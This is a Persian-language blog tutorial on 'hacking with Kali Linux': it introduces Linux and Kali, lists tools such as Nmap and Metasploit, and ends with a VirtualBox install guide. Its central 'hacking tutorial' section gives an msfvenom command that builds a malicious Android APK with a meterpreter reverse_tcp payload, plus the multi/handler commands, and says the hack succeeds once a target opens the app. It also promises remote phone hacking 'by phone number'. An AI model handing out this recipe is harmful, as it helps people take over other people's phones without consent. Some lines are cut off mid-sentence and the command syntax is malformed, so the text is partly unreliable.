هک با کالی لینوکس را مرحله به مرحله آموزش ببینید

این روزها افراد زیادی هستند که تازه شروع به فعالیت در زمینه هک و امنیت نموده اند. اگر شما هم جزء این افراد باشید، حتما تا به حال اسم کالی لینوکس و یا عبارت هک با کالی لینوکس را زیاد شنیده اید و اکنون نیز به دنبال کسب اطلاعات درباره کالی لینوکس و البته انجام هک با کالی لینوکس هستید. ما نیز در این نوشته قصد داریم کالی لینوکس را معرفی کرده و درباره هک با کالی لینوکس نیز مطالبی را در اختیارتان قرار دهیم.

لینوکس چیست ؟

قبل از اینکه به سراغ کالی لینوکس برویم، باید بدانید که لینوکس چیست و چه کارایی هایی در آموزش هک دارد؟

می توان گفت که لینوکس یک سیستم‌عامل شبه یونیکس می باشد که قسمت زیادی از آن سازگار با استاندارد پازیکس است. از نظر فنی لینوکس فقط یک نام برای هستهٔ سیستم‌عامل و نه کل آن است. هسته‌ای که نخستین بار در سال ۱۹۹۱ میلادی توسط لینوس توروالدز منتشر شد. اما معمولا این نام به سیستم‌عامل‌هایی که از ترکیب‌بندی لینوکس (به عنوان هسته سیستم‌عامل) با نرم‌افزارهای آزاد و متن‌باز بدست می‌آیند اطلاق می‌شود. با اینکه بنیاد نرم‌افزار آزاد سیستم‌عامل حاصل از این ترکیب‌بندی را «گنو/لینوکس» می‌نامد اما عموماً آن را لینوکس می‌خوانند. این دوگانگی در نام نهادن منجر به بحث نامگذاری گنو/لینوکس شده‌ است.

لینوکس در ابتدا فقط برای استفادهٔ ریزپردازنده‌هایی با معماری ۸۰۳۸۶ اینتل طراحی شده بود؛ اما امروزه انواع گوناگون معماری‌ها را پشتیبانی می‌کند و در انواع و اقسام وسایل از کامپیوترهای شخصی گرفته تا ابر

کالی لینوکس چیست؟

تا به حال چندین توزیع مختلف برای لینوکس توسط افراد و شرکت های بسیاری ارائه شده است که هر کدام ویژگی های خاص خود را دارند. سیستم عامل هایی نظیر اوبونتو، اوپن سوزه، فدورا، بک ترک و کالی لینوکس از سیستم عامل هایی هستند که با هسته لینوکس نوشته شده اند. در این مطلب توجهمان را به سیستم عامل کالی لینوکس معطوف می کنیم.

کالی لینوکس یک توزیع از لینوکس در زمینه تست امنیت و نفوذ می باشد که بر اساس دبیان پایه گذاری شده است. کالی را می‌توان نسخه بعدی Backtrack دانست که دیگر آپدیت نخواهد شد. این سیستم عامل در انواع نسخه‌های حرفه‌ای و یا lite ارائه شه است و حتی نسخه‌ای مخصوص گوشی‌ موبایل و نسخه‌ای برای فلش نیز دارد. برتری که این سیستم عامل نسبت به سایر سیستم عامل ها دارد، رایگان بودن آن است.

کالی لینوکس ابزارهای بسیاری برای انجام تست های نفوذ دارد که هر یک از این ابزارها ویژگی های خاص و قدرت متفاوتی دارند. تمام افرادی که در زمینه هک و امنیت فعالیت دارند، می بایست کالی لینوکس را به طور کامل بشناسند، چرا که این سیستم عامل قدرت بسیار بالایی در نفوذ به سیستم ها دارد. کالی لینوکس در واقع هم برای هکرها و هم برای متخصصین امنیت ابزاری فوق العاده می باشد و امکانات بسیاری را در اختیار هر دوی آنها قرار می دهد.

شما می‌توانید کلیه ابزارها و امکانات موجود در کالی لینوکس را روی توزیعی مثل UBUNTU نصب نمایید، اما باید بدانید که نصب کردن پکیج‌های مختلف با پیش نیازهایشان کمی درد سر ساز می باشد. کالی لینوکس مجموعه‌ای از تمام ابزارهای رایگان و کاربردی تست نفوذ و امنیت را به صورت یکجا، نصب شده و آماده استفاده برایتان جمع آوری کرده است. علاوه بر این کار ارتباط ابزارهای تست را نیز برای شما به صورت پیش فرض انجام داده است. در ادامه برخی از مهم ترین ابزارهای این سیستم عامل را معرفی می کنیم.

معرفی برخی از ابزارهایی که در این سیستم عامل وجود دارد

• ابزار NMAP جهت جمع آوری اطلاعات و بررسی شبکه و شناسایی همه گره های فعال در شبکه
• ابزار Burp Suite برای نفوذ به سیستم های مبتنی بر وب که از پروتکل HTTP استفاده می کنند.
• ابزار Wireshark  جهت تحلیل بسته های مختلف استفاده می شود.
• ابزار Maltego برای جمع آوری اطلاعات پیش از شروع عملیات نفوذ
• ابزار THC Hydra جهت انجام حملات بروت فورس
• ابزار wasp Zap برای تشخیص آسیب پذیری‌ها در برنامه های مختلف
• ابزار Sqlmap جهت تشخیص مشکلاتی که در پایگاه داده وجود دارد
• Aircrack-ng جهت آزمون نفوذ و تلاش برای شکستن کلمه عبور شبکه‌های بیسیم
• ابزار Metasploit Framework، سیستم جامع نفوذ متااسپلویت
• ابزار John the Ripper جهت شکستن پسوردها استفاده می شود

کالی لینوکس قوی ترین ابزار هک و نفوذ

همانطور که گفتیم و مشاهده نمودید، ابزارهای زیادی در سیستم عامل کالی برای انجام عمل هک و نفوذ به سیستم های کامپیوتری وجود دارد که با کمی مطالعه درباره آن ها می توان به راحتی نحوه کار با این ابزار را فرا گرفت و سپس به عمل هک پرداخت.

کالی لینوکس توانایی بالایی در هک کردن سیستم های مختلف دارد و می توان گفت که با استفاده از این سیستم عامل و در صورت داشتن دانش کافی و ابزار مورد نیاز ، به راحتی می توانید به یک هکر قدرتمند که توانایی انجام هک هر نوع سیستمی از جمله گوشی های موبایل را دارد، تبدیل شوید. با این ابزار همچنین به نوعی می توان نفوذ به دستگاه ها را از راه دور و با شماره موبایل نیز انجام داد. اما برای اطلاعات بیشتر درباره ی این موضوع پیشنهاد می کنم به مقاله ی مربوط به هک گوشی با شماره مراجعه نمایید.

آموزش هک با کالی لینوکس

تا به اینجا به طور کامل با سیستم عامل کالی لینوکس آشنا شدید، حال وقت آن است که روش انجام هک با کالی لینوکس را نیز فرابگیرید. برای هک با کالی لینوکس مراحلی که در ادامه خواهیم گفت را به ترتیب انجام دهید تا موفق به هک با کالی لینوکس این سیستم قدرتمند شوید.

ابتدا نسخه کالی لینوکس را روی سیستم خود نصب نمایید. پس از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می کنید. با استفاده از این ابزار، اقدام به ساخت یک برنامه هک اندروید به صورت APK نمایید. برای ساخت چنین ابزاری تنها نیاز دارید که دستور زیر را در محیط ترمینال لینوکس وارد نمایید.

<msfvenom -p android/meterpreter/reverse_tcp LHOST=(attacker-ip-address) LPORT=(port-to-receive-connection).<Name.apk<==

در دستور فوق به جای عبارت LHOST می توانید از آدرس آی پی خودتان و در قسمت LPORT از پورت اینترنت خودتان استفاده کنید. Name.apk نام ابزاری است که شما به عنوان هکر آن را می سازید تا با آن اقدام به هک نمایید.

سپس با انجام دادن راهکارهای بالا به ترتیب انجام دهید :

• Msf>use exploit/multi/handler
• Msf>set PAYLOAD android/meterpreter/reverse_tcp
• Msf>set LHOST 192.168.1.35
• Msf>set LPORT 443

البته این بار در قسمت LHOST نیاز است که آدرس سرور را وارد کنید. این کار با استفاده از دستور ipconfig در محیط ترمینال انجام میشود و شما به خواسته خود رسیده اید.

حالا وقتی که هدف شما بر روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک کند و آن را اجرا کند، عملیات هک با کالی لینوکس موفقیت آمیز انجام می شود. همانطور که می بینید در این روش هک نیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورات هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک نماید.

چه کسانی با کالی لینوکس کار می کنند؟

برای این که بزرگی این ابزار را متوجه شوید بهتر است که بدانید چه شرکت های بزرگی هستند که با استفاده از کالی لینوکس کار های خود مانند تست نفوذ را انجام می دهند و به نوعی از هک با کالی لینوکس استفاده می کنند. در اینجا با حرفه ای هایی که از Kali Linux استفاده می کنند آشنا می شوید.

مدیران امنیتی

مدیران امنیتی مسئول حفاظت از اطلاعات و داده های موسسه خود هستند. آنها از Kali Linux برای بررسی محیط(های) خود و اطمینان از وجود هیچ آسیب پذیری به راحتی قابل کشف استفاده می کنند.

مدیران شبکه

مدیران شبکه مسئول حفظ یک شبکه کارآمد و ایمن هستند. آنها از کالی لینوکس برای ممیزی شبکه خود استفاده می کنند. به عنوان مثال، کالی لینوکس توانایی شناسایی نقاط دسترسی سرکش را دارد.

معماران شبکه

معماران شبکه، مسئول طراحی محیط های شبکه ایمن هستند. آن‌ها از Kali Linux برای بررسی طرح‌های اولیه خود استفاده می‌کنند .یعنی اطمینان حاصل می‌کنند که هیچ چیز نادیده گرفته نشده یا پیکربندی نادرستی انجام نشده است.

Pen Testers

Pen Testers، از Kali Linux برای ممیزی محیط ها و انجام شناسایی در محیط های شرکتی که برای بررسی آنها استخدام شده اند، استفاده می کنند.

CISO

CISO یا افسران ارشد امنیت اطلاعات، از Kali Linux برای بررسی داخلی محیط خود و کشف اینکه آیا برنامه‌های کاربردی جدید یا پیکربندی‌های rouge در جای خود قرار گرفته‌اند از این ابزار استفاده می کنند.

مهندسین قانونی

کالی لینوکس دارای یک “حالت قانونی” است که به مهندس قانونی اجازه می دهد تا در برخی موارد اطلاعات را کشف و بازیابی کند.

هکرهای کلاه سفید

هکرهای کلاه سفید، مشابه Pen Testers از Kali Linux برای بررسی و کشف آسیب‌پذیری‌هایی که ممکن است در یک محیط وجود داشته باشد، استفاده می‌کنند.

هکرهای کلاه سیاه

هکرهای کلاه سیاه از Kali Linux برای کشف و بهره برداری از آسیب پذیری ها استفاده می کنند. کالی لینوکس همچنین دارای برنامه های مهندسی اجتماعی متعددی است. که می تواند توسط یک هکر کلاه سیاه برای به خطر انداختن یک سازمان یا فرد مورد استفاده قرار گیرد.

هکرهای کلاه خاکستری

هکرهای کلاه خاکستری، بین هکرهای کلاه سفید و کلاه سیاه قرار دارند. آنها از کالی لینوکس با همان روش های ذکر شده در بالا استفاده می کنند.

علاقه مندان به کامپیوتر

علاقه مندان به کامپیوتر یک اصطلاح بسیار کلی است.اما هر کسی که علاقه مند به یادگیری بیشتر در مورد شبکه یا کامپیوتر است، به طور کلی، می تواند از Kali Linux برای کسب اطلاعات بیشتر در مورد فناوری اطلاعات، شبکه و آسیب پذیری های رایج استفاده کند.

آموزش نصب کالی لینوکس با Virtual Box

در اینجا یک فرآیند گام به گام در مورد نحوه نصب Kali Linux با استفاده از Vitual Box و نحوه استفاده از Kali Linux آورده شده است. ساده ترین و مسلماً پرکاربردترین روش، نصب Kali Linux و اجرای آن از VirtualBox Oracle است.

این روش به شما این امکان را می‌دهد تا در حین آزمایش هک با کالی لینوکس غنی‌شده Kali در یک محیط کاملاً ایزوله، به استفاده از سخت‌افزار موجود خود ادامه دهید. بهترین از همه چیز رایگان است. استفاده از Kali Linux و Oracle VirtualBox رایگان است. این آموزش کالی لینوکس فرض می کند که شما قبلا VirtualBox Oracle را بر روی سیستم خود نصب کرده اید و مجازی سازی 64 بیتی را از طریق Bios فعال کرده اید.

مرحله 1)

به https://www.kali.org/downloads/ بروید

این یک تصویر OVA را دانلود می کند که می تواند به VirtualBox وارد شود

مرحله 2)

برنامه Oracle VirtualBox را باز کنید و از منوی File، Import Appliance را انتخاب کنید.

منوی فایل -> Import Appliance

مرحله 3)

در صفحه “Appliance to Import” به محل فایل OVA دانلود شده مراجعه کنید و روی Open کلیک کنید.

مرحله 4)

هنگامی که روی Open کلیک کردید، به قسمت “Appliance to Import” برمی گردید، به سادگی روی Next کلیک کنید.

مرحله 5)

صفحه زیر “Appliance Settings” خلاصه ای از تنظیمات سیستم را نشان می دهد. خروج از تنظیمات پیش فرض خوب است. همانطور که در تصویر زیر نشان داده شده است، محل قرارگیری ماشین مجازی را یادداشت کنید و سپس روی Import کلیک کنید.

مرحله 6)

VirtualBox اکنون دستگاه Kali Linux OVA را وارد می کند. این فرآیند ممکن است بین 5 تا 10 دقیقه طول بکشد.

مرحله 7)

تبریک! کالی لینوکس با موفقیت در VirtualBox نصب شد. اکنون باید Kali Linux VM را در کنسول VirtualBox ببینید. در ادامه، نگاهی به کالی لینوکس و برخی مراحل اولیه برای اجرا خواهیم داشت.

مرحله 8)

روی Kali Linux VM در داشبورد VirtualBox کلیک کنید و روی Start کلیک کنید، با این کار سیستم عامل Kali Linux بوت می شود.

مرحله 9)

در صفحه ورود، “Root” را به عنوان نام کاربری وارد کنید و روی Next کلیک کنید.

مرحله 10) همانطور که قبلا ذکر شد، “toor” را به عنوان رمز عبور وارد کنید و روی SignIn کلیک کنید.

اکنون با دسکتاپ رابط کاربری گرافیکی لینوکس Kali حضور خواهید داشت. تبریک می گویم که با موفقیت به کالی لینوکس وارد شدید.